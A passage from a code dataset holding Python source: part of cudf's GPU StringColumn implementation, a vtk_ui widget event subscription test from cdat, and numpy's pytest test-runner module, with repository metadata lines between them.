String to split on, does not yet support regular expressions.
n : int, default -1 (all)
Limit number of splits in output. `None`, 0, and -1 will all be
interpreted as "all splits".
Returns
-------
DataFrame
Returns a DataFrame with each split as a column.
Notes
-----
The parameter `expand` is not yet supported and will raise a
NotImplementedError if anything other than the default value is set.
"""
if expand is not True:
raise NotImplementedError("`expand` parameter is not supported")
# Pandas treats 0 as all
if n == 0:
n = -1
from cudf.core import DataFrame
out_df = DataFrame(index=self._index)
out = self._parent.nvstrings.split(delimiter=pat, n=n)
for idx, val in enumerate(out):
out_df[idx] = val
return out_df
class StringColumn(column.ColumnBase):
"""Implements operations for Columns of String type
"""
def __init__(self, mask=None, size=None, offset=0, children=()):
"""
Parameters
----------
mask : Buffer
The validity mask
offset : int
Data offset
children : Tuple[Column]
Two non-null columns containing the string data and offsets
respectively
"""
dtype = np.dtype("object")
if size is None:
if len(children) == 0:
size = 0
elif children[0].size == 0:
size = 0
else:
# one less because the last element of offsets is the number of
# bytes in the data buffer
size = children[0].size - 1
size = size - offset
super().__init__(
None, size, dtype, mask=mask, offset=offset, children=children
)
self._nvstrings = None
self._nvcategory = None
self._indices = None
@property
def base_size(self):
if len(self.base_children) == 0:
return 0
else:
return int(
(self.base_children[0].size - 1)
/ self.base_children[0].dtype.itemsize
)
def set_base_data(self, value):
if value is not None:
raise RuntimeError(
"StringColumns do not use data attribute of Column, use "
"`set_base_children` instead"
)
else:
super().set_base_data(value)
def set_base_mask(self, value):
super().set_base_mask(value)
self._indices = None
self._nvcategory = None
self._nvstrings = None
def set_base_children(self, value):
# TODO: Implement dtype validation of the children here somehow
super().set_base_children(value)
self._indices = None
self._nvcategory = None
self._nvstrings = None
@property
def children(self):
if self._children is None:
if len(self.base_children) == 0:
self._children = ()
elif self.offset == 0 and self.base_children[0].size == (
self.size + 1
):
self._children = self.base_children
else:
# First get the base columns for chars and offsets
chars_column = self.base_children[1]
offsets_column = self.base_children[0]
# Shift offsets column by the parent offset.
offsets_column = column.build_column(
data=offsets_column.base_data,
dtype=offsets_column.dtype,
mask=offsets_column.base_mask,
size=self.size + 1,
offset=self.offset,
)
# Now run a subtraction binary op to shift all of the offsets
# by the respective number of characters relative to the
# parent offset
chars_offset = offsets_column[0]
offsets_column = offsets_column.binary_operator(
"sub", offsets_column.dtype.type(chars_offset)
)
# Shift the chars offset by the new first element of the
# offsets column
chars_size = offsets_column[self.size]
chars_column = column.build_column(
data=chars_column.base_data,
dtype=chars_column.dtype,
mask=chars_column.base_mask,
size=chars_size,
offset=chars_offset,
)
self._children = (offsets_column, chars_column)
return self._children
def __contains__(self, item):
return True in self.str().contains(f"^{item}$")._column
def __reduce__(self):
cpumem = self.to_arrow()
return column.as_column, (cpumem, False, np.dtype("object"))
def str(self, index=None, name=None):
return StringMethods(self, index=index, name=name)
def __sizeof__(self):
n = 0
if len(self.base_children) == 2:
n += (
self.base_children[0].__sizeof__()
+ self.base_children[1].__sizeof__()
)
if self.base_mask is not None:
n += self.base_mask.size
return n
def _memory_usage(self, deep=False):
if deep:
return self.__sizeof__()
else:
return self.str().size() * self.dtype.itemsize
def __len__(self):
return self.size
@property
def nvstrings(self):
if self._nvstrings is None:
if self.nullable:
mask_ptr = self.mask_ptr
else:
mask_ptr = None
if self.size == 0:
self._nvstrings = nvstrings.to_device([])
else:
self._nvstrings = nvstrings.from_offsets(
self.children[1].data_ptr,
self.children[0].data_ptr,
self.size,
mask_ptr,
ncount=self.null_count,
bdevmem=True,
)
return self._nvstrings
@property
def nvcategory(self):
if self._nvcategory is None:
import nvcategory as nvc
self._nvcategory = nvc.from_strings(self.nvstrings)
return self._nvcategory
@nvcategory.setter
def nvcategory(self, nvc):
self._nvcategory = nvc
def _set_mask(self, value):
self._nvstrings = None
self._nvcategory = None
self._indices = None
super()._set_mask(value)
@property
def indices(self):
if self._indices is None:
out_dev_arr = rmm.device_array(
self.nvcategory.size(), dtype="int32"
)
ptr = libcudf.cudf.get_ctype_ptr(out_dev_arr)
self.nvcategory.values(devptr=ptr)
self._indices = out_dev_arr
return self._indices
@property
def _nbytes(self):
if self.size == 0:
return 0
else:
return self.children[1].size
def as_numerical_column(self, dtype, **kwargs):
mem_dtype = np.dtype(dtype)
str_dtype = mem_dtype
out_dtype = mem_dtype
if mem_dtype.type is np.datetime64:
if "format" not in kwargs:
if len(self.nvstrings) > 0:
# infer on host from the first not na element
fmt = pd.core.tools.datetimes._guess_datetime_format(
self[self.notna()][0]
)
kwargs.update(format=fmt)
kwargs.update(dtype=out_dtype)
return _str_to_numeric_typecast_functions[str_dtype](self, **kwargs)
def as_datetime_column(self, dtype, **kwargs):
return self.as_numerical_column(dtype, **kwargs)
def as_string_column(self, dtype, **kwargs):
return self
def to_arrow(self):
sbuf = np.empty(self.nvstrings.byte_count(), dtype="int8")
obuf = np.empty(len(self.nvstrings) + 1, dtype="int32")
mask_size = bitmask_allocation_size_bytes(len(self.nvstrings))
nbuf = np.empty(mask_size, dtype="i1")
self.str().to_offsets(sbuf, obuf, nbuf=nbuf)
sbuf = pa.py_buffer(sbuf)
obuf = pa.py_buffer(obuf)
nbuf = pa.py_buffer(nbuf)
if self.null_count == len(self):
return pa.NullArray.from_buffers(
pa.null(), len(self), [pa.py_buffer((b""))], self.null_count
)
else:
return pa.StringArray.from_buffers(
len(self.nvstrings),
obuf,
sbuf,
nbuf,
self.nvstrings.null_count(),
)
def to_pandas(self, index=None):
pd_series = self.to_arrow().to_pandas()
if index is not None:
pd_series.index = index
return pd_series
def to_array(self, fillna=None):
"""Get a dense numpy array for the data.
Notes
-----
if ``fillna`` is ``None``, null values are skipped. Therefore, the
output size could be smaller.
Raises
------
``NotImplementedError`` if there are nulls
"""
if fillna is not None:
warnings.warn("fillna parameter not supported for string arrays")
return self.to_arrow().to_pandas().values
def serialize(self):
header = {"null_count": self.null_count}
header["type-serialized"] = pickle.dumps(type(self))
frames = []
sub_headers = []
for item in self.children:
sheader, sframes = item.serialize()
sub_headers.append(sheader)
frames.extend(sframes)
if self.null_count > 0:
frames.append(self.mask)
header["subheaders"] = sub_headers
header["frame_count"] = len(frames)
return header, frames
@classmethod
def deserialize(cls, header, frames):
# Deserialize the mask, value, and offset frames
buffers = [Buffer(each_frame) for each_frame in frames]
if header["null_count"] > 0:
nbuf = buffers[2]
else:
nbuf = None
children = []
for h, b in zip(header["subheaders"], buffers[:2]):
column_type = pickle.loads(h["type-serialized"])
children.append(column_type.deserialize(h, [b]))
col = column.build_column(
data=None, dtype="str", mask=nbuf, children=tuple(children)
)
return col
def sort_by_values(self, ascending=True, na_position="last"):
if na_position == "last":
nullfirst = False
elif na_position == "first":
nullfirst = True
idx_dev_arr = rmm.device_array(len(self), dtype="int32")
dev_ptr = libcudf.cudf.get_ctype_ptr(idx_dev_arr)
self.nvstrings.order(
2, asc=ascending, nullfirst=nullfirst, devptr=dev_ptr
)
col_inds = column.build_column(
Buffer(idx_dev_arr), idx_dev_arr.dtype, mask=None
)
col_keys = self[col_inds.data_array_view]
return col_keys, col_inds
def copy(self, deep=True):
return column.as_column(self.nvstrings.copy())
def unordered_compare(self, cmpop, rhs):
return _string_column_binop(self, rhs, op=cmpop)
def find_and_replace(self, to_replace, replacement, all_nan):
"""
Return col with *to_replace* replaced with *value*
"""
to_replace = column.as_column(to_replace)
replacement = column.as_column(replacement)
if len(to_replace) == 1 and len(replacement) == 1:
to_replace = to_replace.nvstrings.to_host()[0]
replacement = replacement.nvstrings.to_host()[0]
result = self.nvstrings.replace(to_replace, replacement)
return column.as_column(result)
else:
raise NotImplementedError(
"StringColumn currently only supports replacing"
" single values"
)
def fillna(self, fill_value):
"""
Fill null values with * fill_value *
"""
from cudf.core.series import Series
if not isinstance(fill_value, str) and not (
isinstance(fill_value, Series)
and isinstance(fill_value._column, StringColumn)
):
raise TypeError("fill_value must be a string or a string series")
# replace fill_value with nvstrings
# if it is a column
if isinstance(fill_value, Series):
if len(fill_value) < len(self):
raise ValueError(
"fill value series must be of same or "
"greater length than the series to be filled"
)
fill_value = fill_value[: len(self)]._column.nvstrings
filled_data = self.nvstrings.fillna(fill_value)
result = column.as_column(filled_data)
result = result.set_mask(None)
return result
def _find_first_and_last(self, value):
found_indices = self.str().contains(f"^{value}$")._column
found_indices = libcudfxx.unary.cast(found_indices, dtype=np.int32)
first = column.as_column(found_indices).find_first_value(1)
last = column.as_column(found_indices).find_last_value(1)
return first, last
def find_first_value(self, value, closest=False):
return self._find_first_and_last(value)[0]
def find_last_value(self, value, closest=False):
return self._find_first_and_last(value)[1]
def unique(self, method="sort"):
"""
Get unique strings in the data
"""
import nvcategory as nvc
return column.as_column(nvc.from_strings(self.nvstrings).keys())
def normalize_binop_value(self, other):
if isinstance(other, column.Column):
return other.astype(self.dtype)
elif isinstance(other, str) or other is None:
col = utils.scalar_broadcast_to(
other, size=len(self), dtype="object"
)
return col
else:
raise TypeError("cannot broadcast {}".format(type(other)))
def default_na_value(self):
return None
def binary_operator(self, binop, rhs, reflect=False):
lhs = self
if reflect:
lhs, rhs = rhs, lhs
if isinstance(rhs, StringColumn) and binop == "add":
return lhs.nvstrings.cat(others=rhs.nvstrings)
else:
msg = "{!r} operator not supported between {} and {}"
raise TypeError(msg.format(binop, type(self), type(rhs)))
def sum(self, dtype=None):
# dtype is irrelevant it is needed to be in sync with
# the sum method for Numeric Series
return self.nvstrings.join().to_host()[0]
@property
def is_unique(self):
return len(self.unique()) == len(self)
@property
def is_monotonic_increasing(self):
if not hasattr(self, "_is_monotonic_increasing"):
if self.nullable and self.has_nulls:
self._is_monotonic_increasing = False
else:
self._is_monotonic_increasing = libcudf.issorted.issorted(
columns=[self]
)
return self._is_monotonic_increasing
@property
def is_monotonic_decreasing(self):
if not hasattr(self, "_is_monotonic_decreasing"):
if self.nullable and self.has_nulls:
self._is_monotonic_decreasing = False
else:
self._is_monotonic_decreasing = libcudf.issorted.issorted(
columns=[self], descending=[1]
)
return self._is_monotonic_decreasing
@property
def __cuda_array_interface__(self):
raise NotImplementedError(
"Strings are not yet supported via `__cuda_array_interface__`"
)
def _mimic_inplace(self, other_col, inplace=False):
out = super()._mimic_inplace(other_col, inplace=inplace)
if inplace:
self._nvstrings = other_col._nvstrings
self._nvcategory = other_col._nvcategory
self._indices = other_col._indices
return out
def _string_column_binop(lhs, rhs, op):
nvtx_range_push("CUDF_BINARY_OP", "orange")
# Allocate output
masked = lhs.nullable or rhs.nullable
out = column.column_empty_like(lhs, dtype="bool", masked=masked)
# Call and fix null_count
_ = libcudf.binops.apply_op(lhs=lhs, rhs=rhs, out=out, op=op)
nvtx_range_pop()
return out
| 33.849462 | 79 | 0.574206 |
acfa9f951f40bb32b39dcd686cd414f85f59ee6f | 2,132 | py | Python | testing/vcs/vtk_ui/test_vtk_ui_widget_subscribe_unsubscribe.py | xylar/cdat | 8a5080cb18febfde365efc96147e25f51494a2bf | [
"BSD-3-Clause"
] | 62 | 2018-03-30T15:46:56.000Z | 2021-12-08T23:30:24.000Z | testing/vcs/vtk_ui/test_vtk_ui_widget_subscribe_unsubscribe.py | xylar/cdat | 8a5080cb18febfde365efc96147e25f51494a2bf | [
"BSD-3-Clause"
] | 114 | 2018-03-21T01:12:43.000Z | 2021-07-05T12:29:54.000Z | testing/vcs/vtk_ui/test_vtk_ui_widget_subscribe_unsubscribe.py | CDAT/uvcdat | 5133560c0c049b5c93ee321ba0af494253b44f91 | [
"BSD-3-Clause"
] | 14 | 2018-06-06T02:42:47.000Z | 2021-11-26T03:27:00.000Z | """
Test widget event subscribe / unsubscribe
"""
import vcs.vtk_ui
import vtk
from vtk_ui_test import vtk_ui_test
class test_vtk_ui_widget_subscribe_unsubscribe(vtk_ui_test):
def do_test(self):
self.win.SetSize((100, 100))
vw = vtk.vtkButtonWidget()
vr = vtk.vtkTexturedButtonRepresentation2D()
vr.SetNumberOfStates(1)
r = vtk.vtkPNGReader()
r.SetFileName("Pepper.png")
r.Update()
image = r.GetOutput()
vr.SetButtonTexture(0, image)
vw.SetRepresentation(vr)
w = vcs.vtk_ui.widget.Widget(self.inter, vw)
w.show()
def dummy(*args, **kwargs):
pass
w.subscribe("StartInteractionEvent", dummy)
# Make sure event was properly subscribed to
assert "StartInteractionEvent" in w.subscriptions, "Event not in subscriptions"
# Check observers of w for the tag in w.subscriptions
tag = w.subscriptions["StartInteractionEvent"]
c = vw.GetCommand(tag)
assert c is not None, "Listener not attached to widget"
try:
w.subscribe("StartInteractionEvent", dummy)
print "Failed to notice double event subscription on widget"
return
except KeyError:
pass
w.unsubscribe("StartInteractionEvent")
assert "StartInteractionEvent" not in w.subscriptions, "Did not remove event from subscriptions on unsubscribe"
# Test multiple unsubscriptions
w.subscribe("EndInteractionEvent", dummy)
w.subscribe("StartInteractionEvent", dummy)
w.unsubscribe("StartInteractionEvent", "EndInteractionEvent")
assert "EndInteractionEvent" not in w.subscriptions and "StartInteractionEvent" not in w.subscriptions, "Did not remove both events from widget subscriptions"
try:
w.unsubscribe("StartInteractionEvent")
print "Failed to notice double unsubscribe on widget"
return
except KeyError:
pass
self.passed = 0
if __name__ == "__main__":
test_vtk_ui_widget_subscribe_unsubscribe().test()
| 31.352941 | 166 | 0.655253 |
acfaa1ca54a15a9c963ea0308048fa5d8af49f9d | 6,302 | py | Python | venv/Lib/site-packages/numpy/_pytesttester.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 7 | 2022-01-16T12:28:16.000Z | 2022-03-04T15:31:45.000Z | venv/Lib/site-packages/numpy/_pytesttester.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 150 | 2019-09-30T11:22:36.000Z | 2021-08-02T06:19:29.000Z | venv/Lib/site-packages/numpy/_pytesttester.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 20 | 2021-11-07T13:55:56.000Z | 2021-12-02T10:54:01.000Z | """
Pytest test running.
This module implements the ``test()`` function for NumPy modules. The usual
boiler plate for doing that is to put the following in the module
``__init__.py`` file::
from numpy._pytesttester import PytestTester
test = PytestTester(__name__)
del PytestTester
Warnings filtering and other runtime settings should be dealt with in the
``pytest.ini`` file in the numpy repo root. The behavior of the test depends on
whether or not that file is found as follows:
* ``pytest.ini`` is present (develop mode)
All warnings except those explicitly filtered out are raised as error.
* ``pytest.ini`` is absent (release mode)
DeprecationWarnings and PendingDeprecationWarnings are ignored, other
warnings are passed through.
In practice, tests run from the numpy repo are run in develop mode. That
includes the standard ``python runtests.py`` invocation.
This module is imported by every numpy subpackage, so lies at the top level to
simplify circular import issues. For the same reason, it contains no numpy
imports at module scope, instead importing numpy within function calls.
"""
import sys
import os
__all__ = ['PytestTester']
def _show_numpy_info():
import numpy as np
print("NumPy version %s" % np.__version__)
relaxed_strides = np.ones((10, 1), order="C").flags.f_contiguous
print("NumPy relaxed strides checking option:", relaxed_strides)
info = np.lib.utils._opt_info()
print("NumPy CPU features: ", (info if info else 'nothing enabled'))
class PytestTester:
"""
Pytest test runner.
A test function is typically added to a package's __init__.py like so::
from numpy._pytesttester import PytestTester
test = PytestTester(__name__).test
del PytestTester
Calling this test function finds and runs all tests associated with the
module and all its sub-modules.
Attributes
----------
module_name : str
Full path to the package to test.
Parameters
----------
module_name : module name
The name of the module to test.
Notes
-----
Unlike the previous ``nose``-based implementation, this class is not
publicly exposed as it performs some ``numpy``-specific warning
suppression.
"""
def __init__(self, module_name):
self.module_name = module_name
def __call__(self, label='fast', verbose=1, extra_argv=None,
doctests=False, coverage=False, durations=-1, tests=None):
"""
Run tests for module using pytest.
Parameters
----------
label : {'fast', 'full'}, optional
Identifies the tests to run. When set to 'fast', tests decorated
with `pytest.mark.slow` are skipped, when 'full', the slow marker
is ignored.
verbose : int, optional
Verbosity value for test outputs, in the range 1-3. Default is 1.
extra_argv : list, optional
List with any extra arguments to pass to pytests.
doctests : bool, optional
.. note:: Not supported
coverage : bool, optional
If True, report coverage of NumPy code. Default is False.
Requires installation of (pip) pytest-cov.
durations : int, optional
If < 0, do nothing, If 0, report time of all tests, if > 0,
report the time of the slowest `timer` tests. Default is -1.
tests : test or list of tests
Tests to be executed with pytest '--pyargs'
Returns
-------
result : bool
Return True on success, false otherwise.
Notes
-----
Each NumPy module exposes `test` in its namespace to run all tests for
it. For example, to run all tests for numpy.lib:
>>> np.lib.test() #doctest: +SKIP
Examples
--------
>>> result = np.lib.test() #doctest: +SKIP
...
1023 passed, 2 skipped, 6 deselected, 1 xfailed in 10.39 seconds
>>> result
True
"""
import pytest
import warnings
module = sys.modules[self.module_name]
module_path = os.path.abspath(module.__path__[0])
# setup the pytest arguments
pytest_args = ["-l"]
# offset verbosity. The "-q" cancels a "-v".
pytest_args += ["-q"]
# Filter out distutils cpu warnings (could be localized to
# distutils tests). ASV has problems with top level import,
# so fetch module for suppression here.
with warnings.catch_warnings():
warnings.simplefilter("always")
from numpy.distutils import cpuinfo
# Filter out annoying import messages. Want these in both develop and
# release mode.
pytest_args += [
"-W ignore:Not importing directory",
"-W ignore:numpy.dtype size changed",
"-W ignore:numpy.ufunc size changed",
"-W ignore::UserWarning:cpuinfo",
]
# When testing matrices, ignore their PendingDeprecationWarnings
pytest_args += [
"-W ignore:the matrix subclass is not",
"-W ignore:Importing from numpy.matlib is",
]
if doctests:
raise ValueError("Doctests not supported")
if extra_argv:
pytest_args += list(extra_argv)
if verbose > 1:
pytest_args += ["-" + "v"*(verbose - 1)]
if coverage:
pytest_args += ["--cov=" + module_path]
if label == "fast":
# not importing at the top level to avoid circular import of module
from numpy.testing import IS_PYPY
if IS_PYPY:
pytest_args += ["-m", "not slow and not slow_pypy"]
else:
pytest_args += ["-m", "not slow"]
elif label != "full":
pytest_args += ["-m", label]
if durations >= 0:
pytest_args += ["--durations=%s" % durations]
if tests is None:
tests = [self.module_name]
pytest_args += ["--pyargs"] + list(tests)
# run tests.
_show_numpy_info()
try:
code = pytest.main(pytest_args)
except SystemExit as exc:
code = exc.code
return code == 0
| 31.19802 | 79 | 0.610124 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.